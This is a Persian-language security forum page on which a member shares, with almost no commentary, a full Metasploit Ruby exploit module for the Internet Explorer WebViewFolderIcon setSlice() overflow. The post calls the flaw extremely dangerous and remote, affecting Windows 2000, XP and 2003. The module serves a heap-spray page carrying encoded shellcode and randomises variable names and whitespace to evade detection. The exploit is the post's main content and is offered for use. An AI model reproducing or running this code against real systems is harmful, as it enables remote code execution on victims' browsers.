كارت dvb , كارت دي وي بي , دی وی بی , رسيور , رسیور
| |
اين يك بخش از موضوع Microsoft Windows Shell Code Execution Vulnerability است كه در انجمن آموزش ها و مفاهیم پایه مطرح گرديده و اين انجمن نيز زير مجموعهي تالار هاي امنيتي است: فوق العاده خطرناک و ریموت هم هستش اینم ساپورتشه و تمام ورژنهای ویندوز 2000 و xp و 2003 اینم اکسپلویتش کد: # This module is part of the metasploit framework3 # svn co http://metasploit.com/svn/framework3/trunk/require 'msf/core'module Msfclass Exploits::Windows::Browser::WebView_SetSlice < Msf::Exploit::Remote include Exploit::Remote::HttpServer::Html def initialize(info = {}) super(update_info(info, 'Name' => 'Internet Explorer ...
| ثبت نام | پست جدید | All Albums | Blogs | راهنما | فهرست کاربران | تقویم | جستجو | ارسالهاي امروز | نشانه گذاري انجمن ها به عنوان خوانده شده |
| | ||||||||
| آموزش ها و مفاهیم پایه اینجا در مورد مفاهیم پایه ای صحبت میشه و سوالات در مورد اصطلاحات و پیش زمینه ها و اموزش ان ها اینجا مطرح می شه |
| اطلاعيههاي سايت |
|
| LinkBack | ابزارهای موضوع |
| | #1 | |||||||||||
| عضو نیمه فعال ![]() ![]() تاریخ عضویت: March 13th, 2007
نوشته ها: 111
سطح دانش: 9 [ ]سابقه در سایت: 0 / 213 Thanks: 7
Thanked 48 Times in 31 Posts
قدرت اعتبار: 3 | فوق العاده خطرناک و ریموت هم هستش اینم ساپورتشه و تمام ورژنهای ویندوز 2000 و xp و 2003 اینم اکسپلویتش کد:
# This module is part of the metasploit framework3 # svn co http://metasploit.com/svn/framework3/trunk/require 'msf/core'module Msfclass Exploits::Windows::Browser::WebView_SetSlice < Msf::Exploit::Remote include Exploit::Remote::HttpServer::Html def initialize(info = {}) super(update_info(info, 'Name' => 'Internet Explorer WebViewFolderIcon setSlice() Overflow', 'Description' => %q{ This module exploits a flaw in the WebViewFolderIcon ActiveX control included with Windows 2000, Windows XP, and Windows 2003. This flaw was published during the Month of Browser Bugs project (MoBB #18). }, 'License' => MSF_LICENSE, 'Author' => [ 'hdm', ], 'Version' => '$Revision: 3783 $', 'References' => [ [ 'OSVDB', '27110' ], [ 'BID', '19030' ], [ 'URL', 'http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html' ] ], 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00", }, 'Platform' => 'win', 'Targets' => [ ['Windows XP SP0-SP2 / IE 6.0SP1 English', {'Ret' => 0x0c0c0c0c} ] ], 'DefaultTarget' => 0)) end def autofilter false end def on_request_uri(cli, request) # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) # Encode the shellcode shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) # Get a unicode friendly version of the return address addr_word = [target.ret].pack('V').unpack('H*')[0][0,4] # Randomize the javascript variable names var_buffer = Rex::Text.rand_text_alpha(rand(30)+2) var_shellcode = Rex::Text.rand_text_alpha(rand(30)+2) var_unescape = Rex::Text.rand_text_alpha(rand(30)+2) var_x = Rex::Text.rand_text_alpha(rand(30)+2) var_i = Rex::Text.rand_text_alpha(rand(30)+2) var_tic = Rex::Text.rand_text_alpha(rand(30)+2) var_toc = Rex::Text.rand_text_alpha(rand(30)+2) # Randomize HTML data html = Rex::Text.rand_text_alpha(rand(30)+2) # Build out the message ******* = %Q|<html><head> <******> try { var #{var_unescape} = unescape ; var #{var_shellcode} = #{var_unescape}( "#{shellcode}" ) ; var #{var_buffer} = #{var_unescape}( "%u#{addr_word}" ) ; while (#{var_buffer}.length <= 0x400000) #{var_buffer}+=#{var_buffer} ; var #{var_x} = new Array() ; for ( var #{var_i} =0 ; #{var_i} < 30 ; #{var_i}++ ) { #{var_x}[ #{var_i} ] = #{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} + #{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} + #{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} + #{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} ; } for ( var #{var_i} = 0 ; #{var_i} < 1024 ; #{var_i}++) { var #{var_tic} = new ActiveXObject( 'WebViewFolderIcon.WebViewFolderIcon.1' ); try { #{var_tic}.setSlice( 0x7ffffffe , 0 , 0 , #{target.ret} ) ; } catch( e ) { } var #{var_toc} = new ActiveXObject( 'WebViewFolderIcon.WebViewFolderIcon.1' ); } } catch( e ) { window.location = 'about:blank' ; } </******></head><body>#{html}</body></html> | # Randomize the whitespace in the document *******.gsub!(/\s+/) do |s| len = rand(100)+2 set = "\x09\x20\x0d\x0a" buf = '' while (buf.length < len) buf << set[rand(set.length)].chr end buf end print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response(cli, *******) endendend
| |||||||||||
| |
| برچسب ها |
| vulnerability , execution , code , shell , windows , microsoft |
| ابزارهای موضوع | |
| |
| ||||
| موضوع | نویسنده موضوع | انجمن | پاسخ ها | آخرين نوشته |
| كدهاي بعضي بازيهاي 2006 !!كامپيوتر | Mr.Milad | بازیهای کامپیوتر | 2 | Tuesday 20 March 2007 09:30 AM |
| Microsoft .NET Framework 3.0.04506.03 Pre-Release | Raminmetal | معرفی جدیدترین نرم افزارها | 0 | Tuesday 26 September 2006 01:28 AM |
| AutoPatcher 2003 August 2006 Update براي ويندوز | Raminmetal | مباحث ویندوز (Windows) | 0 | Monday 14 August 2006 12:55 AM |
| Windows Live™ Messenger | behzad1363 | معرفي نرم افزارهاي كاربردي | 0 | Thursday 27 July 2006 03:44 PM |
تمامي قوانين اين سايت از جمهوري اسلامي ايران پيروي مي کند و هرگونه مطالب مخالف قوانين ايران و بنر يا لينک مستهجن در اين سايت جايي ندارد